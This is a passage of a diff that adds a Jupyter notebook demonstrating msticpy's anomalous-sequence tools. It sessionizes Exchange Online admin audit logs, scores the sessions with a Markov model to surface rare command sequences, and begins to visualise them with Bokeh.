+       "4  Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...   \n",
+       "\n",
+       "                                                                                         cmd_param_val  \n",
+       "0  Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\6490d0...  \n",
+       "1  Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\ba36f0...  \n",
+       "2  Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\5fd0c4...  \n",
+       "3  Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\b29157...  \n",
+       "4  Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\83a057...  "
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "exchange.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Use the sessionize_data function <a id='sessionize_data'></a>\n",
+    "\n",
+    "We will do this for the first session type (with just commands).\n",
+    "\n",
+    "But because we created columns for all three session types, you can set the \"event_col\" parameter in the \"sessionize_data\" function below to any of the following:\n",
+    "\n",
+    "1. Operation\n",
+    "2. cmd_param\n",
+    "3. cmd_param_val\n",
+    "\n",
+    "\n",
+    "<b>Here are some details about the arguments for the sessionize_data function:</b>\n",
+    "\n",
+    "```\n",
+    "Help on function sessionize_data in module msticpy.analysis.anomalous_sequence.sessionize:\n",
+    "\n",
+    "sessionize_data(data: pd.DataFrame, user_identifier_cols: List[str], time_col: str, max_session_time_mins: int, max_event_separation_mins: int, event_col: str) -> pd.DataFrame\n",
+    "\n",
+    "    Sessionize the input data.\n",
+    "    \n",
+    "    In particular, the resulting dataframe will have 1 row per session. It will contain the\n",
+    "    following columns: the user_identifier_cols, <time_col>_min, <time_col>_max,\n",
+    "    <event_col>_list, duration (<time_col>_max - <time_col>_min), number_events (length of the\n",
+    "    <event_col>_list value)\n",
+    "    \n",
+    "    Parameters\n",
+    "    ----------\n",
+    "    data: pd.DataFrame\n",
+    "        This dataframe should contain at least the following columns:\n",
+    "            - time stamp column\n",
+    "            - columns related to user name and/or computer name and/or ip address etc\n",
+    "            - column containing an event\n",
+    "    user_identifier_cols: List[str]\n",
+    "        Name of the columns which contain username and/or computer name and/or ip address etc.\n",
+    "        Each time the value of one of these columns changes, a new session will be started.\n",
+    "    time_col: str\n",
+    "        Name of the column which contains a time stamp.\n",
+    "        If this column is not already in datetime64[ns, UTC] format, it will be casted to it.\n",
+    "    max_session_time_mins: int\n",
+    "        The maximum length of a session in minutes. If a sequence of events for the same\n",
+    "        user_identifier_cols values exceeds this length, then a new session will be started.\n",
+    "    max_event_separation_mins: int\n",
+    "        The maximum length in minutes between two events in a session. If we have 2 events for\n",
+    "        the same user_identifier_cols values, and if those two events are more than\n",
+    "        `max_event_separation_mins` apart, then a new session will be started.\n",
+    "    event_col: str\n",
+    "        Name of the column which contains the event of interest.\n",
+    "        For example, if we are interested in sessionizing exchange admin commands,\n",
+    "        the \"event_col\" could contain values like: \"Set-Mailbox\" or \"Set-User\" etc.\n",
+    "    \n",
+    "    Returns\n",
+    "    -------\n",
+    "    pd.DataFrame containing the sessionized data. 1 row per session.\n",
+    "\n",
+    "```\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# sessionize the data\n",
+    "\n",
+    "sessions_df = sessionize.sessionize_data(\n",
+    "    data=exchange,\n",
+    "    user_identifier_cols=['UserId', 'ClientIP'],\n",
+    "    time_col='TimeGenerated',\n",
+    "    max_session_time_mins=20,\n",
+    "    max_event_separation_mins=2,\n",
+    "    event_col='Operation'\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "(400, 7)"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "sessions_df.shape"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>ClientIP</th>\n",
+       "      <th>TimeGenerated_min</th>\n",
+       "      <th>TimeGenerated_max</th>\n",
+       "      <th>Operation_list</th>\n",
+       "      <th>duration</th>\n",
+       "      <th>number_events</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-12 01:34:59+00:00</td>\n",
+       "      <td>2020-05-12 01:35:02+00:00</td>\n",
+       "      <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>\n",
+       "      <td>00:00:03</td>\n",
+       "      <td>13</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-12 04:48:43+00:00</td>\n",
+       "      <td>2020-05-12 04:48:46+00:00</td>\n",
+       "      <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>\n",
+       "      <td>00:00:03</td>\n",
+       "      <td>13</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-20 02:18:27+00:00</td>\n",
+       "      <td>2020-05-20 02:18:31+00:00</td>\n",
+       "      <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>\n",
+       "      <td>00:00:04</td>\n",
+       "      <td>14</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-20 05:12:55+00:00</td>\n",
+       "      <td>2020-05-20 05:12:58+00:00</td>\n",
+       "      <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>\n",
+       "      <td>00:00:03</td>\n",
+       "      <td>14</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-21 01:50:12+00:00</td>\n",
+       "      <td>2020-05-21 01:50:13+00:00</td>\n",
+       "      <td>[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...</td>\n",
+       "      <td>00:00:01</td>\n",
+       "      <td>14</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                        UserId  \\\n",
+       "0  NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)   \n",
+       "1  NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)   \n",
+       "2  NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)   \n",
+       "3  NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)   \n",
+       "4  NAMPRD06\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)   \n",
+       "\n",
+       "  ClientIP         TimeGenerated_min         TimeGenerated_max  \\\n",
+       "0      NaN 2020-05-12 01:34:59+00:00 2020-05-12 01:35:02+00:00   \n",
+       "1      NaN 2020-05-12 04:48:43+00:00 2020-05-12 04:48:46+00:00   \n",
+       "2      NaN 2020-05-20 02:18:27+00:00 2020-05-20 02:18:31+00:00   \n",
+       "3      NaN 2020-05-20 05:12:55+00:00 2020-05-20 05:12:58+00:00   \n",
+       "4      NaN 2020-05-21 01:50:12+00:00 2020-05-21 01:50:13+00:00   \n",
+       "\n",
+       "                                                                                        Operation_list  \\\n",
+       "0  [Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...   \n",
+       "1  [Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...   \n",
+       "2  [Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...   \n",
+       "3  [Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...   \n",
+       "4  [Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond...   \n",
+       "\n",
+       "  duration  number_events  \n",
+       "0 00:00:03             13  \n",
+       "1 00:00:03             13  \n",
+       "2 00:00:04             14  \n",
+       "3 00:00:03             14  \n",
+       "4 00:00:01             14  "
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "sessions_df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Model the sessions <a id='explain_model'></a>\n",
+    "\n",
+    "We will give a brief description of how the modelling works under the hood for each of the three session types.\n",
+    "\n",
+    "* <b>Commands only</b>\n",
+    "    - We treat the sessions as an ordered sequence of commands. \n",
+    "    - We apply the Markov assumption where we assume each command depends only on the command immediately before it.\n",
+    "    - This means the likelihood of each session can be computed by multiplying a sequence of transition probabilities together.\n",
+    "    - We use a sliding window (e.g. of length 3) throughout each session and then use the likelihood of the rarest window as the score for the session.<br/><br/>\n",
+    "* <b>Commands with Parameters</b>\n",
+    "    - All of the above (\"commands only\" case) except for one difference.\n",
+    "    - This time, we include the parameters in the modelling.\n",
+    "    - We make the assumption that the presence of each parameter is independent conditional on the command.\n",
+    "    - We therefore model the presence of the parameters as independent Bernoulli random variables (conditional on the command)\n",
+    "    - So to compute the likelihood of a session, each transition probability (of the commands) will be accompanied by a product of probabilities (for the parameters). \n",
+    "    - A subtlety to note, is that we take the geometric mean of the product of parameter probabilities. This is so we don't penalise commands which happen to have more parameters set than on average.\n",
+    "    - We use the same sliding window approach used with the \"commands only\" case. <br/><br/>\n",
+    "* <b>Commands with Parameters and their Values</b>\n",
+    "    - All of the above (\"commands with parameters\" case) except for one difference.\n",
+    "    - This time, we include the values in the modelling.\n",
+    "    - Some rough heuristics are used to determine which parameters have values which are categorical (e.g. \"true\" and \"false\" or \"high\", \"medium\" and \"low\") vs values which are arbitrary strings (such as email addresses). There is the option to override the \"modellable_params\" directly in the Model class.\n",
+    "    - We also make the assumption that the values depend only on the parameters and not on the command.\n",
+    "    - So to compute the likelihood of a session, each transition probability (of the commands) will be accompanied by a product of probabilities (for the parameters and categorical values). \n",
+    "    - We use the same sliding window approach used with the \"commands only\" case.\n",
+    "    \n",
+    "    \n",
+    "#### Important note: \n",
+    "If you set the window length to be k, then only sessions which have at least k-1 commands will have a valid (not np.nan) score. The reason for the -1 is because we append an end token to each session by default, so a session of length k-1 gets treated as length k during the scoring.\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## There are 3 high level functions available in this library\n",
+    "\n",
+    "1. score_sessions\n",
+    "2. visualize_scored_sessions\n",
+    "3. score_and_visualize_sessions"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## We will first demonstrate the high level function for modelling the sessions. <a id='model_function'></a>\n",
+    "\n",
+    "We will do this for the \"Commands Only\" session type.\n",
+    "\n",
+    "But depending on which column you chose as the event_col in the [sessionize_data function](#sessionize_data),\n",
+    "you could set the \"session_column\" parameter in the \"score_sessions\" function below to any of the following:\n",
+    "\n",
+    "1. Operation_list\n",
+    "2. cmd_param_list\n",
+    "3. cmd_param_val_list\n",
+    "\n",
+    "<b>Here are some details about the arguments for the score_sessions function:</b>\n",
+    "\n",
+    "```\n",
+    "Help on function score_sessions in module msticpy.analysis.anomalous_sequence.anomalous:\n",
+    "\n",
+    "score_sessions(data: pd.DataFrame, session_column: str, window_length: int) -> pd.DataFrame\n",
+    "\n",
+    "    Model sessions using a sliding window approach within a markov model.\n",
+    "    \n",
+    "    Parameters\n",
+    "    ----------\n",
+    "    data: pd.DataFrame\n",
+    "        Dataframe which contains at least a column for sessions\n",
+    "    session_column: str\n",
+    "        name of the column which contains the sessions\n",
+    "        The values in the session column should take one of the following formats:\n",
+    "            examples formats of a session:\n",
+    "            1) ['Set-User', 'Set-Mailbox']\n",
+    "            2) [Cmd(name='Set-User', params={'Identity', 'Force'}),\n",
+    "                Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]\n",
+    "            3) [Cmd(\n",
+    "                    name='Set-User',\n",
+    "                    params={'Identity': 'blahblah', 'Force': 'true'}\n",
+    "                ),\n",
+    "                Cmd(\n",
+    "                    name='Set-Mailbox',\n",
+    "                    params={'Identity': 'blahblah', 'AuditEnabled': 'false'}\n",
+    "                )]\n",
+    "        The Cmd datatype can be accessed from\n",
+    "        anomalous_sequence.utils.data_structures.Cmd\n",
+    "    window_length: int\n",
+    "        length of the sliding window to use when computing the likelihood\n",
+    "        metrics for each session.\n",
+    "        This should be set to an integer >= 2. Note that sessions which have\n",
+    "        fewer commands than the chosen window_length + 1 will end up with a\n",
+    "        np.nan score. (The + 1 is because we append a dummy `end_token` to each\n",
+    "        session before starting the sliding window, so a session of length 2,\n",
+    "        would be treated as length 3)\n",
+    "    \n",
+    "    Returns\n",
+    "    -------\n",
+    "    input dataframe with two additional columns appended.\n",
+    "\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# This function will return a dataframe with two additonal columns appended:\n",
+    "# \"rarest_window3_likelihood\" and \"rarest_window3\"\n",
+    "\n",
+    "modelled_df = anomalous.score_sessions(\n",
+    "    data=sessions_df,\n",
+    "    session_column='Operation_list',\n",
+    "    window_length=3\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>ClientIP</th>\n",
+       "      <th>TimeGenerated_min</th>\n",
+       "      <th>TimeGenerated_max</th>\n",
+       "      <th>Operation_list</th>\n",
+       "      <th>duration</th>\n",
+       "      <th>number_events</th>\n",
+       "      <th>rarest_window3_likelihood</th>\n",
+       "      <th>rarest_window3</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>157</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-03-26 22:40:30+00:00</td>\n",
+       "      <td>2020-03-26 22:40:33+00:00</td>\n",
+       "      <td>[New-Mailbox, Set-Mailbox]</td>\n",
+       "      <td>00:00:03</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000021</td>\n",
+       "      <td>[New-Mailbox, Set-Mailbox]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>216</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-04-17 21:00:31+00:00</td>\n",
+       "      <td>2020-04-17 21:00:31+00:00</td>\n",
+       "      <td>[New-App, New-App]</td>\n",
+       "      <td>00:00:00</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000028</td>\n",
+       "      <td>[New-App, New-App]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>261</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-06 01:49:17+00:00</td>\n",
+       "      <td>2020-05-06 01:50:56+00:00</td>\n",
+       "      <td>[Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...</td>\n",
+       "      <td>00:01:39</td>\n",
+       "      <td>48</td>\n",
+       "      <td>0.000063</td>\n",
+       "      <td>[Set-ExchangeAssistanceConfig, Set-TransportConfig, Set-RecipientEnforcementProvisioningPolicy]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>247</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-05-02 11:31:53+00:00</td>\n",
+       "      <td>2020-05-02 11:33:14+00:00</td>\n",
+       "      <td>[Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...</td>\n",
+       "      <td>00:01:21</td>\n",
+       "      <td>49</td>\n",
+       "      <td>0.000081</td>\n",
+       "      <td>[Set-ExchangeAssistanceConfig, Set-AdminAuditLogConfig, Set-TenantObjectVersion]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>224</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>2020-04-23 21:42:48+00:00</td>\n",
+       "      <td>2020-04-23 21:44:45+00:00</td>\n",
+       "      <td>[Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...</td>\n",
+       "      <td>00:01:57</td>\n",
+       "      <td>49</td>\n",
+       "      <td>0.000085</td>\n",
+       "      <td>[Set-OwaMailboxPolicy, Set-Mailbox, Add-MailboxPermission]</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    UserId ClientIP         TimeGenerated_min         TimeGenerated_max  \\\n",
+       "157    NaN      NaN 2020-03-26 22:40:30+00:00 2020-03-26 22:40:33+00:00   \n",
+       "216    NaN      NaN 2020-04-17 21:00:31+00:00 2020-04-17 21:00:31+00:00   \n",
+       "261    NaN      NaN 2020-05-06 01:49:17+00:00 2020-05-06 01:50:56+00:00   \n",
+       "247    NaN      NaN 2020-05-02 11:31:53+00:00 2020-05-02 11:33:14+00:00   \n",
+       "224    NaN      NaN 2020-04-23 21:42:48+00:00 2020-04-23 21:44:45+00:00   \n",
+       "\n",
+       "                                                                                          Operation_list  \\\n",
+       "157                                                                           [New-Mailbox, Set-Mailbox]   \n",
+       "216                                                                                   [New-App, New-App]   \n",
+       "261  [Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...   \n",
+       "247  [Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...   \n",
+       "224  [Enable-AddressListPaging, New-ExchangeAssistanceConfig, Set-TransportConfig, Install-DefaultSha...   \n",
+       "\n",
+       "    duration  number_events  rarest_window3_likelihood  \\\n",
+       "157 00:00:03              2                   0.000021   \n",
+       "216 00:00:00              2                   0.000028   \n",
+       "261 00:01:39             48                   0.000063   \n",
+       "247 00:01:21             49                   0.000081   \n",
+       "224 00:01:57             49                   0.000085   \n",
+       "\n",
+       "                                                                                      rarest_window3  \n",
+       "157                                                                       [New-Mailbox, Set-Mailbox]  \n",
+       "216                                                                               [New-App, New-App]  \n",
+       "261  [Set-ExchangeAssistanceConfig, Set-TransportConfig, Set-RecipientEnforcementProvisioningPolicy]  \n",
+       "247                 [Set-ExchangeAssistanceConfig, Set-AdminAuditLogConfig, Set-TenantObjectVersion]  \n",
+       "224                                       [Set-OwaMailboxPolicy, Set-Mailbox, Add-MailboxPermission]  "
+      ]
+     },
+     "execution_count": 11,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Let's view the resulting dataframe in ascending order of the computed likelihood metric\n",
+    "\n",
+    "modelled_df.sort_values('rarest_window3_likelihood').head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['New-Mailbox', 'Set-Mailbox']"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# we can view individual sessions in more detail\n",
+    "\n",
+    "modelled_df.sort_values('rarest_window3_likelihood').rarest_window3.iloc[0]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Now we demonstrate the visualization component of the library <a id='visualize_function'></a>\n",
+    "\n",
+    "We do this using the \"visualise_scored_sessions\" function. This function returns an interactive timeline plot which allows you to zoom into different sections etc.\n",
+    "\n",
+    "* The time of the session will be on the x-axis.\n",
+    "* The computed likelihood metric will be on the y-axis.\n",
+    "* lower likelihoods correspond to rarer sessions.\n",
+    "\n",
+    "<b>Important note</b>:\n",
+    "\n",
+    "During the scoring/modelling stage, if you set the window length to be k, then only sessions which have at least k-1 commands will appear in the interactive timeline plot. This is because sessions with fewer than k-1 commands will have a score of np.nan. The reason for the -1 is because we append an end token to each session by default, so a session of length k-1 gets treated as length k during the scoring.\n",
+    "\n",
+    "<b>Here are some details about the arguments for the visualise_scored_sessions function:</b>\n",
+    "\n",
+    "```\n",
+    "Help on function visualise_scored_sessions in module msticpy.analysis.anomalous_sequence.anomalous:\n",
+    "\n",
+    "visualise_scored_sessions(data_with_scores: pandas.core.frame.DataFrame, time_column: str, score_column: str, window_column: str, score_upper_bound: float = None, source_columns: list = None)\n",
+    "\n",
+    "    Visualise the scored sessions on an interactive timeline.\n",
+    "    \n",
+    "    Parameters\n",
+    "    ----------\n",
+    "    data_with_scores: pd.DataFrame\n",
+    "        Dataframe which contains at least columns for time,\n",
+    "        session score, window representing the session\n",
+    "    time_column: str\n",
+    "        name of the column which contains a timestamp\n",
+    "    score_column: str\n",
+    "        name of the column which contains a numerical score for each\n",
+    "        of the sessions\n",
+    "    window_column: str\n",
+    "        name of the column which contains a representation of each of the sessions.\n",
+    "        This representation will appear in the tooltips in the figure.\n",
+    "        For example, it could be the rarest window of the session,\n",
+    "        or the full session etc.\n",
+    "    score_upper_bound: float, optional\n",
+    "        an optional upper bound on the score for the visualisation figure.\n",
+    "        This can help to zoom in on the more anomalous sessions\n",
+    "    source_columns: list, optional\n",
+    "        an optional list of source columns to include in the tooltips\n",
+    "        in the visualisation.\n",
+    "        Note, the content of each of these columns should be json serializable\n",
+    "        in order to be compatible with the figure\n",
+    "    \n",
+    "    Returns\n",
+    "    -------\n",
+    "    figure\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1001\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
